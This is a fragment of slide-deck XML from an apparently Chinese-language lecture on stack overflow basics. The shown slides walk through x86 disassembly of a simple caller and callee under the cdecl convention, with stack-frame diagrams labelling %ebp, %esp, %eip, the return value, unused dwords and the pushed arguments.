            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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E5242FB6-B2FC-4E5A-8279-67DC58FB085A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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76" name="Shape 276"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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77" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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78" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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79" name="Shape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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80" name="Shape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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81" name="Shape 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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82" name="Shape 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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283" name="Shape 283"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="284" name="Shape 284"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="285" name="Shape 285"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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286" name="Shape 286"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="3847279"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="287" name="Shape 287"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="288" name="Shape 288"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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289" name="Shape 289"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2314981"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="Shape 290"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="291" name="Shape 291"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A8638DC-FA4E-4FAA-AC7E-C720DB63C027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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05F0217E-665E-4988-AC98-10555AAA4432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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hape 297"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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98" name="Shape 298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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99" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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00" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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01" name="Shape 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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02" name="Shape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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03" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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04" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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305" name="Shape 305"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="306" name="Shape 306"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="307" name="Shape 307"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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308" name="Shape 308"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444788" y="5076241"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="Shape 309"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="310" name="Shape 310"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Shape 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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3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12" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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2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13" name="Shape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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1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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2922700"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Shape 315"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="316" name="Shape 316"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853C4DDC-5FE3-4A4F-8411-85A63C6AB2C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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FB651D2C-3E25-46D0-896F-55EC3D2B9E02}"/>
              </a:ext>
            </a:extLst>
